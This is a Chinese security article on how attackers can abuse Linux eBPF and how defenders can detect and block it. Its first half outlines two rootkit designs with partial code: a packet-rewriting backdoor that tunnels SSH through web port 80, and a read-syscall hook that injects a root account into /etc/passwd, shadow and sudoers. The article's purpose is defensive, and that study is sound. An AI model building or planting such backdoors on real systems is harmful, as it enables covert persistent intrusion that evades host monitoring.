速来报名!AICon北京站鸿蒙专场~ 了解详情
写点什么

浅谈:Linux 中基于 eBPF 的恶意利用与检测机制

  • 2023-03-16
    北京
  • 本文字数:13307 字

    阅读完需:约 44 分钟

浅谈:Linux中基于eBPF的恶意利用与检测机制

前言  


近几年,云原生领域飞速发展,Kubernetes 成为公认的云操作系统。容器的高频率部署、短暂的生命周期、复杂的网络路由,都给内核安全带来了新的挑战。系统内核面对的复杂性在不断增长,在满足性能、可扩展性等新需求的同时,还需要保障系统稳定可用,这是极其困难的事情。此时,eBPF 出现,它以较小的子系统改动,保障了系统内核的稳定,还具备实时动态加载的特性,能将业务逻辑加载到内核,实现热更新的动态执行。


eBPF由 BPF 发展而来,BPF 全称 Berkeley Packet Filter,1992 年由 Steven McCanne 和 Van Jacobson 提出,1997 年引入 Linux Kernel 2.1,3.0 中增加了即时编译器,应用在网络过滤领域。2014 年 Alexei Starovoitov 实现了 eBPF 并扩展到用户空间,威力更大。常用的 TCPDUMP&LIBPCAP 就是基于它。在 Linux Kernel 4.x 中,扩展了内核态函数、用户态函数、跟踪点、性能事件(perf_events)以及安全控制等事件类型。尤其是近几年云原生快速发展,也带动了 eBPF 的繁荣。微软、Google、Facebook 等企业成立 eBPF 基金会,Cilium 公司也发布了基于 eBPF 技术实现的网络产品。不过,在 eBPF 技术带动新业务快速发展的同时,也带来了安全威胁

现状分析

 

我们可以从一些海外资料和国内资料中可以看到,eBPF 在解决很多技术难题的同时,也被很多非法的组织和机构恶意利用。

海外资料


Black Hat


在 Black Hat 2021 的峰会中,Datadog 工程师 Guillaume Fournier 带来主题为《With Friends Like eBPF, Who Needs Enemies?》的分享,他介绍了 eBPF 如何被恶意利用,包括如何构建一个 rootkit、如何利用,并将检测防御代码放在了GitHub 上。


DEF CON


在 DEF CON29 峰会上,安全研究员 Pat Hogan 也分享了一些 eBPF 被恶意利用的案例:《Warping Reality - creating and countering the next generation of Linux rootkits using eBPF》 ,这里介绍了 eBFP rootkit 的应用场景,包括网络、运行时等场景,以及如何检测 eBPF 被恶意利用等。代码也放在了GitHub 上。


国内资料


对比国外,国内 eBPF 被恶意利用的资料较少,相关技术分享也较少。可能这方面的危害还没有得到国内安全同行的关注,如果我们继续这样,势必影响到国内公司在网络安全防御体系层面的建设,进而导致安全防护落后于国外,给企业安全甚至国家安全带来较大的风险。美团信息安全团队作为防御体系的建设方,有责任也有义务带领大家更好地认识这种恶意利用,分享美团在检测防御方面的经验,加固网络安全产品,希望能为国内信息安全建设贡献一份绵薄之力。

eBPF 技术恶意利用的攻击原理


知己知彼,才能百战不殆,要想做好防御,必须要了解它的攻击原理。我们先来看下 eBPF 的 rootkit 是如何设计的。从 eBPF 的功能来看,它提供了以下领域的功能:


  • 网络

  • 监控

  • 观测

  • 跟踪 &性能分析

  • 安全


网络领域,Cilium 等云原生公司做了很多网络层的产品,在实现网格管理的同时,也做了相应的网络层面安全策略,尤其是在网络编排领域,表现尤为亮眼,逐步代替 iptables 等产品,大有一统江山的趋势。而在监控观测等领域也有很多产品。尤其是运行时安全(Runtime Security)领域,Datadog、Falco、Google 等公司也都推出了相应的产品。感兴趣的同学,可以参考相关产品源码分析(Cilium eBPF实现机制源码分析Datadog的eBPF安全检测机制分析)的分享。


我们回顾一下 eBPF 技术的 hook 点:

从图中可以看出,eBPF 的 hook 点功能包括以下几部分:


  1. 可以在 Storage、Network 等与内核交互之前;

  2. 也可以在内核中的功能模块交互之间;

  3. 又可以在内核态与用户态交互之间;

  4. 更可以在用户态进程空间。


eBPF 的功能覆盖 XDP、TC、probe、socket 等,每个功能点都能实现内核态的篡改行为,从而使得用户态完全致盲,哪怕是基于内核模块的 HIDS,一样无法感知这些行为。


基于 eBPF 的功能函数,从业务场景来看,网络、监控、观测类的功能促进了云原生领域的产品发展;跟踪/性能分析、安全类功能,加快了安全防御、审计类产品演进;而安全领域的恶意利用,也会成为黑客关注的方向。本文将与大家探讨一下新的威胁与防御思路。


从数据流所处阶段来看,本文划分为两部分,接下来一起来讨论恶意利用、风险危害与防御思路。


  1. Linux 网络层恶意利用

  2. Linux 系统运行时恶意利用

Linux 网络层恶意利用


以一个 SSH、Web 服务的服务器为例,在 IDC 常见网络访问策略中,开放公网 Web 80 端口允许任意来源的 IP 访问。而 SSH 服务只允许特定 IP,或者只开放内网端口访问。


假设这台服务器已经被黑客入侵,黑客需要留下一个后门,且需要一个隐藏、可靠的网络链路作为后门通道,那么在 eBPF 技术上,会如何实现呢?


XDP/TC 层修改 TCP 包


为了让后门隐藏的更好,最好是不开进程,不监听端口(当前部分我们只讨论网络层隐藏)。而 eBPF 技术在 XDP、TC、Socket 等内核层的功能,能够实现流量信息修改,这些功能常被应用在 L3、L4 的网络负载均衡上。比如 Cilium 的网络策略都是基于 eBPF XDP 实现。eBPF hook 了 XDP 点后,更改了 TCP 包的目标 IP,系统内核再将该数据包转发出去。


按照 XDP 与 TC 在 Linux 内核中,处理 ingress 与 egress 的位置,可以更准确地确定 hook 点。


  • XDP 的 BPF_PROG_TYPE_XDP 程序类型,可以丢弃、修改、重传来自 ingress 的流量,但无法对 egress 起作用。

  • TC 的 BPF_PROG_TYPE_SCHED_CLS 除了拥有 XDP“BPF_PROG_TYPE_XDP”的功能外,还可以对 egress 起作用。


前者最常用的场景就是做网络防火墙,用于网络流量清洗,效率比传统防火墙的高很多。后者常用于云原生场景下,容器、Pod 的网络监控、安全访问控制等。在这个例子中,要对进出流量都做调整,故两个 hook 点都需要有。同样,在 XDP 等阶段的 hook,在这里做相关包逻辑的处理,能更好地将通信包隐藏,tcpdump 等工具都抓不到。


控制链路


在后门场景里,可以在同样的位置,像 eBPF 的负载均衡一样,修改目标端口,从 Web Nginx 的 80 改为 SSHD 的 22,就可以实现网络数据的透传,绕开防火墙以及网络访问限制。


认证密钥


由于后门 rootkit 是在 XDP\TC 层工作,为了尽可能的简单,认证密钥最好只使用链路层、网络层、传输层的数据,即 MAC 信息、IP 五元组之类。IP 经常变动,MAC 地址大概率是唯一的,以及设定一个固定的端口,这样更加唯一,作为 rootkit 的认证密钥即可实现(需要 Client 发起连接时,指定客户端的 TCP 端口)。


eBPF uprobe 与 eBPF map 联动


对于后门 rootkit 的密钥更新,利用 eBPF 也很好实现。比如在 Nginx 的场景中,uprobe 实现 hook HTTP 的函数,获取 URL 参数中特定字符串,再将字符串保存到 eBPF map 里,就实现了密钥更新。


XDP/TC 层的 eBPF rootkit 执行时,读取 eBPF map 里的密钥,进行比较运算。


实现流程


举个 XDP 处理 ingress 的例子:

SEC("xdp/ingress")int xdp_ingress(struct xdp_md *ctx) {struct cursor c;struct pkt_ctx_t pkt;
//判断是否为SSHD的协议,不是则直接放行if (!(不是SSHD协议(&c))) {return XDP_PASS;}
//判断rootkit是否匹配,网卡信息与来源端口是否匹配hack_mac[] = "读取bpf map配置。"if(密钥不匹配) {return XDP_PASS;}
// 读取map,是否已经存在该client信息struct netinfo client_key = {};__builtin_memcpy(&client_key.mac, &pkt.eth->h_source, ETH_ALEN);
struct netinfo *client_value;client_value = bpf_map_lookup_elem(&ingress_client, &client_key);
// 如果没找到伪装信息,则自己组装if(!client_value) {__builtin_memset(&client_value, 0, sizeof(client_value));} else {bpf_map_update_elem(&ingress_client, &client_key, &client_value, BPF_ANY);}

// 伪装mac局域网mac信息pkt.eth->h_source[0] = 0x00;...
// 替换伪装ip来源 ,客户端端口不变
// 更改目标端口pkt.tcp->dest = htons(FACK_PORT); //22
//计算TCP SUM layer 4ipv4_csum(pkt.tcp, sizeof(struct tcphdr), &csum);pkt.tcp->check = csum;
//写入已伪装的map,用于TC处理egress的原mac、IP信息还原。return XDP_PASS;}
复制代码


比较简单的 Demo,即可实现 ingress 侧 TCP 数据包的伪装。同样,TC 层处理 egress 方向的数据包时,只需要对伪装包的原始信息作还原即可。整个流程如下图所示:



这样,rootkit 的通信链路并不影响正常用户访问,也没有对原系统做改动,隐蔽性特别好。


视频演示


笔者准备了三台主机测试:


  1. 入侵者:cnxct-mt2,IP 为 172.16.71.1。

  2. 普通用户:ubuntu,IP 为 172.16.71.3。

  3. 被入侵服务器:vm-ubuntu,IP 为 172.16.71.4。开放 nginx web 80 端口;开放 SSHD 22 端口,并设定 iptables 规则只允许内网 IP 访问。


00:00 / 00:00
    1.0x
    • 3.0x
    • 2.5x
    • 2.0x
    • 1.5x
    • 1.25x
    • 1.0x
    • 0.75x
    • 0.5x
    网页全屏
    全屏
    00:00


    危害


    这个 rootkit 不主动创建 Socket,借用其中一个网络发送包,把消息送达给后门使用者。对系统影响来说,只是一个不起眼的小网络响应。在万千 HTTP 包里,根本定位不到。


    1. iptables 防火墙绕过:利用对外开放的 80 端口作为通信隧道;

    2. WebIDS 绕过:流量到达服务器后,并不传递给 Nginx;

    3. NIDS 绕过:入侵者流量在局域网之间流传并无异常,只是无法解密;

    4. HIDS 绕过:是否信任了防火墙,忽略了本机/局域网来源的 SSHD 登录。

    Linux 系统运行时恶意利用


    云原生生态下,涌现大批基于 eBPF 技术实现的集群网络管理插件,比如 Calico、Cilium 等。而业务实现网络管理服务是以容器化方式部署,且有需要给这些容器启用 SYS_BPF_ADMIN 权限以支持 eBPF 系统调用。这些服务的运行环境,也给攻击者留下一个完美的发挥空间。


    实现流程


    回顾 eBPF 的 hook 点,作用在 syscall 的 kprobe、tracepoint 事件类型,倘若用在后门 rootkit 场景,是十分可怕的。比如修改内核态返回给用户态的数据、拦截阻断用户态行为等,为所欲为。而更可怕的是,常见的 HIDS 都是基于内核态或者用户态做行为监控,eBPF 恰恰绕开了大部分 HIDS 的监控,且不产生任何日志,简直让人“细思极恐、不寒而栗”。


    tracepoint 事件类型 hook


    在 SSHD 应用中,当用户登录时,会读取/etc/passwd 等文件。用户态 SSHD 程序,调用 open、read 等系统调用,让内核去硬件磁盘上检索数据,再返回数据给 SSHD 进程。


    用户态生成 payload


    用户态实现/etc/passwd、/etc/shadow 等文件 payload 的生成,并通过 eBPF 的 RewriteConstants 机制,完成对 ELF .rodata 的字段值替换。


    import "github.com/ehids/ebpfmanager"
    // 通过elf的常量替换方式传递数据func (e *MBPFContainerEscape) constantEditor() []manager.ConstantEditor { var username = RandString(9) var password = RandString(9) var s = RandString(8)
    salt := []byte(fmt.Sprintf("$6$%s", s)) // use salt to hash user-supplied password c := sha512_crypt.New() hash, err := c.Generate([]byte(password), salt) var m = map[string]interface{}{} res := make([]byte, PAYLOAD_LEN) var payload = fmt.Sprintf("%s ALL=(ALL:ALL) NOPASSWD:ALL #", username) copy(res, payload) m["payload"] = res m["payload_len"] = uint32(len(payload))
    // 生成passwd字符串 var payload_passwd = fmt.Sprintf("%s:x:0:0:root:/root:/bin/bash\n", username) // 生成shadow字符串 var payload_shadow = fmt.Sprintf("%s:%s:18982:0:99999:7:::\n", username, hash) // eBPF RewriteContants var editor = []manager.ConstantEditor{ { Name: "payload", Value: m["payload"], FailOnMissing: true, }, { Name: "payload_len", Value: m["payload_len"], FailOnMissing: true, }, } return editor}
    func (this *MBPFContainerEscape) setupManagers() { this.bpfManager = &manager.Manager{ Probes: []*manager.Probe{ { Section: "tracepoint/syscalls/sys_enter_openat", EbpfFuncName: "handle_openat_enter", AttachToFuncName: "sys_enter_openat", }, ... },
    Maps: []*manager.Map{ { Name: "events", }, }, }
    this.bpfManagerOptions = manager.Options{ ... // 填充 RewriteContants 对应map ConstantEditors: this.constantEditor(), }}
    复制代码


    内核态使用 payload


    const volatile int payload_len = 0;...const volatile char payload_shadow[MAX_PAYLOAD_LEN];
    SEC("tracepoint/syscalls/sys_exit_read")int handle_read_exit(struct trace_event_raw_sys_exit *ctx){ // 判断是否为rootkit行为,是否需要加载payload ... long int read_size = ctx->ret; // 判断原buff长度是否小于payload if (read_size < payload_len) { return 0; } // 判断文件类型,匹配追加相应payload switch (pbuff_addr->file_type) { case FILE_TYPE_PASSWD: // 覆盖payload到buf,不足部分使用原buff内容 { bpf_probe_read(&local_buff, MAX_PAYLOAD_LEN, (void*)buff_addr); for (unsigned int i = 0; i < MAX_PAYLOAD_LEN; i++) { if (i >= payload_passwd_len) { local_buff[i] = ' '; } else { local_buff[i] = payload_passwd[i]; } } } break; case FILE_TYPE_SHADOW: // 覆盖 shadow文件 ... break; case FILE_TYPE_SUDOERS: //覆盖sudoers ... break; default: return 0; break; }

    // 将payload内存写入到buffer ret = bpf_probe_write_user((void*)buff_addr, local_buff, MAX_PAYLOAD_LEN); // 发送事件到用户态 return 0;}
    复制代码


    按照如上 Demo rootkit 的设计,即完成了随机用户名密码的 root 账号添加。在鉴权认证上,也可以配合“eBPF 网络层恶意利用”的 Demo,利用 eBPF map 交互,实现相应鉴权。但 rootkit 本身并没有更改硬盘上文件,不产生风险行为。并且,只针对特定进程的做覆盖,隐蔽性更好。整个流程如下图所示:



    不管是在物理机上,还是给了 root+BPF 权限的容器上,都一样生效。


    视频演示


    00:00 / 00:00
      1.0x
      • 3.0x
      • 2.5x
      • 2.0x
      • 1.5x
      • 1.25x
      • 1.0x
      • 0.75x
      • 0.5x
      网页全屏
      全屏
      00:00

      严重危害


      云原生场景下,赋予 SYS_ADMIN 权限的容器场景很多,若配合近期的“Java log4j”漏洞,直接击穿容器,拿到宿主机权限,是不是很可怕?


      然而,比这可怕的是:这种 rootkit 本身并没有产生用户态行为日志,也没有改文件,系统里查不到这个用户信息。整个后门行为不产生数据,让大部分 HIDS 失灵

      综述


      从本文演示的这两个场景可以来看,相信大家已经知道了 eBPF 技术被恶意利用的危害性。其实,这只是 eBPF 技术被恶意利益的“冰山一角”,在 kproeb\uprobe 上也有很多功能,比如实现进程隐藏、无痕内网扫描等等。更多相关的恶意利用,大家可参考Bad BPF - Warping reality using eBPF一文。


      若入侵者精心设计 rootkit,实现进程隐藏等,让 rootkit 更加隐蔽,按照本文的思路,实现一个“幽灵般”的后门,想想就让人后怕。


      常规的主机安全防御产品一般用 Netlink、Linux Kernel Module 等技术实现进程创建、网络通信等行为感知,而 eBPF 的 hook 点可以比这些技术更加深,比它们执行更早,意味着常规 HIDS 并不能感知发现它们。

      传统 rootkit,采用 hook api 的方法,替换原来函数,导致执行函数调用地址发生变化,已有成熟检测机制,eBPF hook 不同于传统 rootkit,函数调用堆栈不变。这给检测带来很大的麻烦。


      那面对这种后门,我们该如何检测防御呢?

      检测防御


      从事件发生的过程来看,分为三个阶段:


      • 运行前

      • 运行时

      • 运行后


      运行前 


      在恶意程序运行前,减少攻击面,这个思路是不变的。

      环境限制


      不管是宿主机还是容器,都进行权限收敛,能不赋予 SYS_ADMIN、CAP_BPF 等权限,就禁止掉。若一定要开放这个权限,那么只能放到运行时的检测环节了。

      seccomp 限制 


      在容器启动时,修改默认 seccomp.json,禁止 bpf 系统调用,防止容器逃逸,注意此方法对于 Privileged 特权容器无效。

      内核编译参数限制


      修改函数返回值做运行时防护时,需要用到 bpf_override_return,该函数需要内核开启 CONFIG_BPF_KPROBE_OVERRIDE 编译参数,因此非特殊情况不要开启该编译参数。

      非特权用户指令


      大部分 eBPF 程序类型都需要 root 权限的用户才能调用执行。但有几个例外,比如 BPF_PROG_TYPE_SOCKET_FILTER 和 BPF_PROG_TYPE_CGROUP_SKB 这两个类型,就不需要 root。但需要读取系统配置开关。


      //https://elixir.bootlin.com/linux/v5.16.9/source/kernel/bpf/syscall.c#L2240
      if (type != BPF_PROG_TYPE_SOCKET_FILTER && type != BPF_PROG_TYPE_CGROUP_SKB && !bpf_capable()) return -EPERM;
      复制代码


      开关确认


      在/proc/sys/kernel/unprivileged_bpf_disabled 里,可通过执行sysctl kernel.unprivileged_bpf_disabled=1来修改配置。配置含义见Documentation for /proc/sys/kernel/


      • 值为 0 表示允许非特权用户调用 bpf;

      • 值为 1 表示禁止非特权用户调用 bpf 且该值不可再修改,只能重启后修改;

      • 值为 2 表示禁止非特权用户调用 bpf,可以再次修改为 0 或 1。

      特征检查 


      有人提议,在内核加载 BPF 字节码时,进行签名验证,以便达到只加载安全签名的 BPF 字节码。在 lwn.net 中也列出这个话题:BPF字节码签名计划


      但很多人也提出反对意见,他们认为 BPF 模块这几年的发展,过于抽象化,越来越复杂,所以不希望加入额外的功能,让 BPF 更加不稳定。而是改变思路,让字节码加载时签名,改为“执行 BPF 字节码加载的用户态程序进行签名”,这个是已有的内核功能,不会增加系统复杂性。


      本文认为,这确实可以缓解大部分 BPF 字节码加载的问题。但使用系统原生命令(tc\ip\bpftool等)加载的话,仍面临威胁。比如:ip link set dev ens33 xdp obj xdp-example_pass.o


      运行检查


      大部分 eBPF 程序在重启后不存在了,所以入侵者会尽可能让后门自启动。对于 Linux 系统的自启动、crontab 等计划任务做好检查。


      用户态程序可以以各种形式存在,ELF 可执行文件、ELF so 动态链接库都可以。在执行时,必定会调用 BPF syscall 来加载 BPF 字节码。若只是对可执行 ELF 做检测,还不够准确。

      运行时

      监控 


      Linux 系统中,所有的程序运行,都必须进行系统调用,eBPF 程序也不例外。需要调用 syscall 为 321 的 SYS_BPF 指令。并且,所有的 eBPF 程序执行、map 创建都必须进行这个 syscall 调用。那么,在这个必经之路进行拦截监控,是最好的方案。


      SEC("tracepoint/syscalls/sys_enter_bpf")int tracepoint_sys_enter_bpf(struct syscall_bpf_args *args) { struct bpf_context_t *bpf_context = make_event(); if (!bpf_context)  return 0; bpf_context->cmd = args->cmd; get_common_proc(&bpf_context->procinfo); send_event(args, bpf_context);    return 0;}
      复制代码


      这里,我们开源的 ehids 项目做了一个 BPF syscall 检测的例子,大家可以 Fork 了解。仓库地址为:GitHub/ehids


      细心的读者这时可能会有疑问,假如入侵者的后门执行比较早,对这个系统调用进行欺骗,那怎么办呢?这是一个非常好的问题,我们将放到运行后的溯源章节进行讨论。但对于大部分场景,HIDS 防御产品还是可以做到第一时间启动的。

      审计 &筛查 


      上面我们讨论了对 BPF 系统的调用进行监控。而在云原生场景中,基于 eBPF 实现的网络产品会频繁调用,会产生大量的事件日志,从而给运营同学带来较大的压力。那么,对行为做精简、做精确筛选,就成为我们接下来的目标。


      根据程序白名单筛选


      数据过滤,是解决大量数据压力的一种方案。在一些 BPF 应用的业务服务器上,本身业务行为会产生大量调用,会给安全预警带来较大审计压力。对于已知的进程,我们可以根据进程特征过滤。


      获取当前进程 pid、comm 等属性,根据用户态写入 eBPF map 的配置,决定是否上报、是否拦截。也可以在用户态做过滤,但内核态效率更高。如果是做拦截,那必须要在内核态实现。


      大家可以参考saBPF产品设计思路 ,用 eBPF 实现 LSM hook 点的钩子程序,完成相关审计调用。虽然GitHub/saBPF-project 的项目代码还只是 Demo,但思路可以借鉴。

      根据 SYSCALL 类型筛选


      在 BPF syscall 里,子命令的功能包含 map、prog 等多种类型的操作,bpf() subcommand reference 里有详细的读写 API。在实际的业务场景里,“写”的安全风险比“读”大。所以,我们可以过滤掉“读”操作,只上报、审计“写”操作。


      比如:

      • MAP 的创建 BPF_MAP_CREATE

      • PROG 加载 BPF_PROG_LOAD

      • BPF_OBJ_PIN

      • BPF_PROG_ATTACH

      • BPF_BTF_LOAD

      • BPF_MAP_UPDATE_BATCH


      尤其是有 BPF 需求的业务场景,可以更好的审计日志。

      运行后


      这里提几个问题,eBPF 用户态程序与内核态程序交互,加载 BPF 字节码后,能退出吗?退出后,内核 hook 的 BPF 函数还工作吗?创建的 map 是否还存在?后门程序为了保证更好的隐蔽性,我们当如何选择?


      如果要回答这些问题,不得不提 BPF 程序的加载机制,BPF 对象生命周期。

      文件描述符与引用计数器


      用户态程序通过文件描述符 FD 来访问 BPF 对象(progs、maps、调试信息),每个对象都有一个引用计数器。用户态打开、读取相应 FD,对应计数器会增加。若 FD 关闭,引用计数器减少,当 refcnt 为 0 时,内核会释放 BPF 对象,那么这个 BPF 对象将不再工作。


      在安全场景里,用户态的后门进程若退出后,后门的 eBPF 程序也随之退出。在做安全检查时,这可以作为一个有利特征,查看进程列表中是否包含可疑进程。


      但并非所有 BPF 对象都会随着用户态进程退出而退出。从内核原理来看,只需要保证 refcnt 大于 0,就可以让 BPF 对象存活,让后门进程持续工作了。其实在 BPF 的程序类型中,像 XDP、TC 和基于 CGROUP 的钩子是全局的,不会因为用户态程序退出而退出。相应 FD 会由内核维护,保证 refcnt 计数器不为零,从而继续工作。

      溯源 


      安全工程师经常需要根据不同场景作不同的溯源策略。本文给的溯源方式中,都使用了 eBPF 的相关接口,这意味着:如果恶意程序比检查工具运行的早,那么对于结果存在伪造的可能


      短生命周期


      BPF 程序类型代表


      • k[ret]probe

      • u[ret]probe

      • tracepoint

      • raw_tracepoint

      • perf_event

      • socket filters

      • so_reuseport


      特点是基于 FD 管理,内核自动清理,对系统稳定性更好。这种程序类型的后门,在排查时特征明显,就是用户态进程。并且可以通过系统正在运行的 BPF 程序列表中获取。


      bpftool 工具


      eBPF 程序列表


      命令 bpftool prog show,以及 bpftool prog help 查看更多参数。



      结果中,可以看到当前系统正在运行的 BPF 程序、关联的 BPF map ID,以及对应的进程信息等。另外,细心的读者可能发现,结果中,XDP 数据中并没有进程 ID 信息,稍后讨论。


      eBPF map 列表


      命令bpftool map show,以及bpftool map help可以查看更多参数。



      通过查看 map 信息,可以与程序信息作辅助矫正。并且,可以导出 map 内数据用来识别恶意进程行为。这部分我们在“取证”章节讨论。


      bpflist-bpfcc


      bpflist-bpfcc -vv 命令可以看到当前服务器运行的部分 BPF 程序列表。以笔者测试环境为例:

      root@vmubuntu:/home/cfc4n/project/xdp## bpflist-bpfcc  -vvopen kprobes:
      open uprobes:
      PID COMM TYPE COUNT1 systemd prog 810444 ehids map 410444 ehids prog 5
      复制代码


      可以看到系统进程 systemd 启动了 8 个 prog 程序。ehids 进程创建了 4 个 eBPF map 与 5 个 prog。但实际上前面也执行了ip link set dev ens33 xdp obj xdp-example_pass.o命令,在这里却没有显示出来。意味着这个命令输出的结果并不是所有 bpf 程序、map 的情况。



      长生命周期


      BPF 程序类型代表


      • XDP

      • TC

      • LWT

      • CGROUP


      上面提到以 ip 命令加载 BPF 字节码的场景,常见 BPF 工具查询不到或信息缺失。这背后原因,需要从它的工作原理讲起。


      ip 命令加载 bpf 原理


      BPF 对象的生命周期使用引用计时器管理,这一大原则是所有 BPF 对象都需要遵守的。而长生命周期的程序类型起 FD 是用户控件程序传递参数给内核空间,之后再由内核空间维持。


      以前面提到的 IP 命令ip link set dev ens33 xdp obj xdp-example_pass.o为例。ip 命令的参数中包含 bpf 字节码文件名,ip 进程打开.o 字节码的 FD,通过 NETLINK 发 IFLA_XDP 类型消息(子类型 IFLA_XDP_FD)给内核,内核调用 dev_change_xdp_fd 函数,由网卡接管 FD,引用计数器递增,用户空间的 ip 进程退出后,BPF 程序依旧工作。内核源码参见:elixir.bootlin.com/linux


      本文做了抓包验证,ip 程序关联 XDP 程序类型:


      17:53:22.553708 sendmsg(3,  { msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000},  msg_namelen=12,  msg_iov=[  {   iov_base={    {nlmsg_len=52, nlmsg_type=RTM_NEWLINK, nlmsg_flags=NLM_F_REQUEST|NLM_F_ACK, nlmsg_seq=1642672403, nlmsg_pid=0},     {ifi_family=AF_UNSPEC, ifi_type=ARPHRD_NETROM, ifi_index=if_nametoindex("ens33"), ifi_flags=0, ifi_change=0},     {     {nla_len=20, nla_type=IFLA_XDP},      [      {{nla_len=8, nla_type=IFLA_XDP_FD}, 6},       {{nla_len=8, nla_type=IFLA_XDP_FLAGS}, XDP_FLAGS_UPDATE_IF_NOEXIST}     ]    }   },   iov_len=52  }  ],  msg_iovlen=1,  msg_controllen=0,  msg_flags=0 }, 0) = 52
      复制代码


      可以看到 IFLA_XDP_FD 后面的 FD 参数是 6。同样,删除 XDP 程序,需要把 FD 设置为-1,对应 NETLINK 包构成如下:


       17:55:16.306843 sendmsg(3,  { ...     {nla_len=20, nla_type=IFLA_XDP},      [      {{nla_len=8, nla_type=IFLA_XDP_FD}, -1},       {{nla_len=8, nla_type=IFLA_XDP_FLAGS}, XDP_FLAGS_UPDATE_IF_NOEXIST}     ] } ... }, 0) = 52
      复制代码


      不止 ip 命令,TC命令分类器 也是支持 BPF 程序,将 BPF 程序作为 classifiers 和 act ions 加载到 ingress/egress hook 点。背后原理与 IP 类似,也是 NetLink 协议与内核通信,网卡维持 BPF 对象计数器。


      检测机制


      使用原生 IP、TC 等命令,查看网卡加载的 BPF 对象。


      1. ip link show

      2. tc filter show dev [网卡名] [ingress|egress]



      使用 bpftool 命令查看


      bpftool net show dev ens33 -p 命令可以用于查看网络相关的 eBPF hook 点。


      CGROUP 的的 BPF_PROG_TYPE_CGROUP_SKB、BPF_PROG_TYPE_CGROUP_SOCK 类型程序的加载情况都可以通过 bpftool prog show 查看。长短生命周期的 BPF 程序区别是缺少用户空间进程 PID 信息。如下图所示:


      BPFFS


      除了前面提到的方法外,BPF 文件系统 BPFFS 也是让 BPF 程序后台运行的方式。用户空间进程可以使用任意名字将 BPF 程序 PIN 到 BPFFS。让在 BPFFS 来自动增加 BPF 对象的 refcnt 引用计数器,来保持后台的活跃状态。在使用时,只需要使用 bpf_obj_get(“BPFFS path”)就可以获得 BPF 对象的 FD。


      BPFFS 在 Linux 的类型是 BPF_FS_MAGIC,默认目录/sys/fs/bpf/,可自定义修改,但确保文件系统类型是 unix.BPF_FS_MAGIC。


      在检测思路上,我们需要关注虚拟文件系统是不是 unix.BPF_FS_MAGIC 类型。


      在 Linux 系统上,mount -t bpf来查看系统所有挂在的文件类型,是否包含 BPFFS 类型。



      确定 BPFFS 的目录后,我们再查看目录下的挂载点是否存在异常。

      取证


      内核已加载的 BPF 对象导出


      bpftool 工具可以导出有 FD ID 的 PROG、MAP。 BPF PROG 程序 可以导出 opcode\visual\linum 等多种格式,并可以生成调用关系图。具体可以查看 bpftool 的帮助文件。

      root@vmubuntu:/home/cfc4n# bpftool prog helpbpftool prog dump xlated PROG [{ file FILE | opcodes | visual | linum }]bpftool prog dump jited  PROG [{ file FILE | opcodes | linum }]
      复制代码


      BPF MAP 与 PROG 类似,也可以通过 bpftool 导出内容,并支持 json 格式化内容。

       root@vmubuntu:/home/cfc4n# bpftool map dump id 20[{        "value": {            ".rodata": [{                    "target_ppid": 0                },{                    "uid": 0                },{                    "payload_len": 38    ...
      复制代码



      BPFFS 类型的 BPF 对象,虽然可以更便捷的放到后台执行,用户空间程序可以退出,也可以再次读取,但这也给取证带来很大便利。bpftool 命令也支持从 pinned 到 BPFFS 文件系统的路径里导出 prog、map。参数稍有区别,详情见 bpftool help。



      内核未加载的 BPF 对象


      当定位到后门 rootkit 的用户空间程序后,那么 BPF 字节码肯定会被其调用。字节码内容一般会放在一个独立文件中,或者作为字节码编译到当前程序里。这也只需要使用 IDA 之类反编译工具,定位到相关字节流,导出即可。


      以本文演示视频中的 ehids 进程为例,使用GitHub/ehids/ebpfmanager 纯 Go 的 eBPF 模块管理器 package,对于 eBPF 字节码会使用 github.com/shuLhan/go-bindata/cmd/go-bindata 包对 BPF 字节码进行加载、Gzip 压缩,作为 Go 代码的变量,在部署时比较边界。


      IDA Pro 加载时,我们可以在.noptrdata 段部分看到这块代码,开始地址是 0000000000827AE0,导出后再解压,可以还原原来的 BPF ELF 文件内容。



      因为每个 BPF 用户态实现不同,类库也不一样,静态分析实践起来有难度。那可以模拟相同环境,动态运行,提前 hook BPF syscall,找到 FD 设置的地方,也是可以导出 BPF 的 ELF 文件。


      字节码分析


      BPF 字节码本身也是 ELF 格式,只是格式指令上有一定区别。反编译工具 IDA pro 也能支持,国外安全工程师开源了一个 Python 插件:eBPF IDA Proc ,并整理了一篇分析的文章:Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool ,感兴趣的同学可以读读。


      如何防御 


      eBPF 在网络安全场景的使用,除了做入侵检测外,还可以用于防御。LSM PROBE hook 提供了相关功能。以容器逃逸场景为例,行为最明显的特征是“父子进程”的 Namespace 不一致,子进程创建完成后,判断这个特征是否匹配,返回 EPERM 覆盖进程创建函数的返回值,从而起到防御的目的。相比内核模块等防御实现,eBPF 实现更加安全、稳定、可靠,从而在源头上解决容器逃逸的问题。


      同样,本文认为 eBPF 也是二进制层最优秀的虚拟补丁、热更新解决方案。


      LSM_PROBE(bpf, int cmd, union bpf_attr *attr, unsigned int size){    return -EPERM;}
      复制代码


      在系统的配置上有一定要求,CONFIG_BPF_LSM=y、CONFIG_LSM 等配置内容,必须包含 bpf 等,详情可参考BCC类库Demo lsm probe 。

      工程实现

      练手


      入门练手,可以尝试使用 BCC 的类库:GitHub/BCC ,以及 C 语言用户空间程序的各种 Demo 例子Demo BPF applications 。

      类库选择


      工程化时,对项目质量、稳定性、研发效率等都有要求,推荐 Cilium 的纯 Go eBPF 类库,由 Cilium 官方背书可放心使用。Datadog 公司的 Agent 产品也是用这个类库。


      本文的产品也是参考 Datadog,抽象包装了 Cilium 的 eBPF 库,实现配置化便捷管理 eBPF 程序。GitHub 仓库:ehids/ebpfmanager ,欢迎大家使用。



      当然,也可以使用 libbpf 包装的 go 类库实现,比如 tracee 等产品。

      系统兼容性 CO-RE


      eBPF 的出现极大地简化了编写内核态代码的门槛,极高的安全性,友好的加载方式,高效的数据交互,令 eBPF 深受追捧。然而和编写传统内核模块相同,内核态的功能开发伴随着繁冗的适配测试工作,Linux 繁多的内核版本更是让适配这件事难度陡增,这也就是 BTF 出现之前的很长一段时间里,bcc + clang + llvm 被人们诟病的地方。程序在运行的时候,才进行编译,目标机器还得安装 clang llvm kernel-header 等编译环境,同时编译也会消耗大量 CPU 资源,这在某些高负载机器上是不能被接受的。


